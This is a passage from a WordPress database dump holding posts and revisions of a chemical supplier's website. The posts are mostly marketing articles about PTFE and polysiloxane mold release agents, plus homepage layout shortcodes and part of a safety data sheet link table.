bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16,20" number="10"]\r\n\r\nTo learn more about our mold release agents please <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For any questions about proper application of our mold release products please view our article which discusses this process</strong></a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n 	<li><strong><a href="https://en.wikipedia.org/wiki/Release_agent">Understanding Release Agents</a></strong></li>\r\n</ul>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2017-06-15 15:43:02', '2017-06-15 15:43:02', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4581, 3, '2017-06-15 15:45:26', '2017-06-15 15:45:26', '<h2>Mold Release Agent: Which is right for you?</h2>\r\nMold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agent are available and which variant would compliment their production method.  There are several distinct release agents categories: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Reactive polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason, manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and reactive polysiloxanes.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release agent solutions for it customers, hence our companies specializes in providing advanced release chemistry. Our company is 100% back-integrated meaning our manufacturing, inventory, and quality are maintained regardless of fluctuations in the market.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n<h3><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Dry Film Mold Release Agent</strong></a></h3>\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong>[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agent solutions (MS-122 and MS-143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform dry, thin films that exhibit excellent surface adhesion and durability. Miller-Stephenson PTFE release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.\r\n\r\nProduction engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. Our PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n<h3><strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">Reactive polysiloxanes</a> (ReleaSys™) Mold Release Agent</strong></h3>\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> <strong><a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a></strong> excels are molding of large composite structures, yielding efficient release, cycle after cycle.[/caption]\r\n\r\nReactive polysiloxanes are the newest generation of mold release agent, designed to crosslink and bind to the mold surface.  <strong>These semi-permanent mold release agent chemistries generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.</strong>  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 550-600 F. Other reactive siloxanes provide a rapid cure, even at room temperature, with a minimum reduction in durability and abrasion resistance.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in irregular curing and transfer can occur.  Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.\r\n\r\nMiller-Stephenson\'s new <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys™ product</a></strong> line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys™ is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n<h3>Innovative Chemistry, Superior Cost-Effectiveness, and Unmatched Technical Service</h3>\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16,20" number="10"]\r\n\r\nTo learn more about our mold release agents please <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For any questions about proper application of our mold release products please view our article which discusses this process</strong></a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n 	<li><strong><a href="https://en.wikipedia.org/wiki/Release_agent">Understanding Release Agents</a></strong></li>\r\n</ul>', 'Mold Release Agent Chemistries: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2017-06-15 15:45:26', '2017-06-15 15:45:26', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4582, 0, '2017-06-15 15:45:54', '2017-06-15 15:45:54', '', '', '', 'publish', 'closed', 'closed', '', '4582', '', '', '2017-06-15 15:45:55', '2017-06-15 15:45:55', '', 0, 'https://www.miller-stephenson.com/nf_sub/4582/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4583, 0, '2017-06-15 15:47:15', '2017-06-15 15:47:15', '', '', '', 'publish', 'closed', 'closed', '', '4583', '', '', '2017-06-15 15:47:16', '2017-06-15 15:47:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/4583/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4584, 3, '2017-06-15 15:50:34', '2017-06-15 15:50:34', '<h2>Mold Release Agent: Which is right for you?</h2>\r\n<h3>Miller-Stephenson’s exclusive mold release product lines offer advanced chemistry and modern, eco-friendly formulations for the molding industry.</h3>\r\nMold release agent application provide the critical barrier between the molding surface and substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agent are available and which variant would compliment their production method.  There are several distinct release agents categories: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Reactive polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason, manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and reactive polysiloxanes.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release agent solutions for it customers, hence our companies specializes in providing advanced release chemistry. Our company is 100% back-integrated meaning our manufacturing, inventory, and quality are maintained regardless of fluctuations in the market.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n<h3><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Dry Film Mold Release Agent</strong></a></h3>\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong>[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agent solutions (MS-122 and MS-143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform dry, thin films that exhibit excellent surface adhesion and durability. Miller-Stephenson PTFE release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.\r\n\r\nProduction engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. Our PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n<h3><strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">Reactive polysiloxanes</a> (ReleaSys™) Mold Release Agent</strong></h3>\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> <strong><a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a></strong> excels are molding of large composite structures, yielding efficient release, cycle after cycle.[/caption]\r\n\r\nReactive polysiloxanes are the newest generation of mold release agent, designed to crosslink and bind to the mold surface.  <strong>These semi-permanent mold release agent chemistries generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.</strong>  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 550-600 F. Other reactive siloxanes provide a rapid cure, even at room temperature, with a minimum reduction in durability and abrasion resistance.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in irregular curing and transfer can occur.  Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.\r\n\r\nMiller-Stephenson\'s new <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys™ product</a></strong> line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys™ is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n<h3>Innovative Chemistry, Superior Cost-Effectiveness, and Unmatched Technical Service</h3>\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16,20" number="10"]\r\n\r\nTo learn more about our mold release agents please <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For any questions about proper application of our mold release products please view our article which discusses this process</strong></a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n 	<li><strong><a href="https://en.wikipedia.org/wiki/Release_agent">Understanding Release Agents</a></strong></li>\r\n</ul>', 'Mold Release Agent Chemistries: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2017-06-15 15:50:34', '2017-06-15 15:50:34', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4585, 0, '2017-06-15 18:49:57', '2017-06-15 18:49:57', '', '', '', 'publish', 'closed', 'closed', '', '4585', '', '', '2017-06-15 18:49:57', '2017-06-15 18:49:57', '', 0, 'https://www.miller-stephenson.com/nf_sub/4585/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4586, 3, '2017-06-15 19:25:41', '2017-06-15 19:25:41', '[ux_banner_grid height="500" depth="3" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="90"]\r\n\r\n[button text="ABOUT US" color="white" style="outline" size="xlarge" radius="62" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box width="79" position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="259px" bg="86" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col_grid span="9" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="4144" bg_size="orginal" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[text_box width="21" position_x="100" position_y="0"]\r\n\r\n[button text="Industrial &amp; medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n[col_grid span="3" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="1932" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\r\n\r\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col span="3" align="0"]\r\n\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Custom Solutions</h3>\r\nCustom-built mold release agents, specialty coatings or unique formulations. Our engineering department can design a optimized solution for your application needs.\r\n\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0"]\r\n\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0"]\r\n\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Large Inventory</h3>\r\nOur fully stocked USA &amp; Canadian locations allow us to ensure swift delivery. Vast KRYTOX inventory of most grades at bulk pricing.\r\n\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0"]\r\n\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Eco-Friendly</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n\r\n[/featured_box]\r\n\r\n[/col]\r\n[col]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle" link="https://www.miller-stephenson.com/releasys-release-agent/"]\r\n\r\n[text_box width="47" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys™ </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" color="white" style="outline" radius="82" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2205" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2206"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1588"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2243"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2208"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n&nbsp;', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-06-15 19:25:41', '2017-06-15 19:25:41', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4587, 317, '2017-06-15 19:57:38', '2017-06-15 19:57:38', '<h1>Miller-Stephenson SDS database.</h1>\r\nIf you are unable to locate the specific SDS you need, please contact our Technical Support at support@mschem.com or 203-743-4447 (8-4 E.T.)\r\n<table width="1119">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="219"><strong>Aerosol</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Liquid</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Release Agents</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Conformal Coatings</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Krytox</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Epoxy</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/124H-15.pdf">MS-124H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/111.pdf">MS-111</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122AD.pdf">MS-122AD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/452N.pdf">MS-452N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AGL683.pdf">AGL 683</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/900.pdf">MS-900</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222L.pdf">MS-222L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/114C.pdf">MS-114C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ADRED.pdf">MS-122AD RED</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/460H.pdf">MS-460H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AT.pdf">AT</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/905A.pdf">MS-905 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/115.pdf">MS-115</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ADL.pdf">MS-122ADL</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/462H.pdf">MS-462H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/ATA.pdf">ATA</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/905B.pdf">MS-905 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222T</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/182SD.pdf">MS-182SD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122AV.pdf">MS-122AV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/465C.pdf">MS-465C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT2A45.pdf">AUT 2A45</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/907A.pdf">MS-907 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222F</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/126H.pdf">MS-126H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122E.pdf">MS-122E</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/467C.pdf">MS-467C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT523.pdf">AUT 523</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/907B.pdf">MS-907 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/242L.pdf">MS-242L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/126HUV.pdf">MS-126HUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ERED.pdf">MS-122E RED</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/470C-16.pdf">MS-470C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT1045.pdf">AUT 1045</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/908A.pdf">MS-908 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/04/242L-AS-17.pdf">MS-242L-AS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/383A.pdf">MS-383A</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122SE.pdf">MS-122SE</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/02/472C-15.pdf">MS-472C</a></td>\r\n<td style="text-align: center;"><a 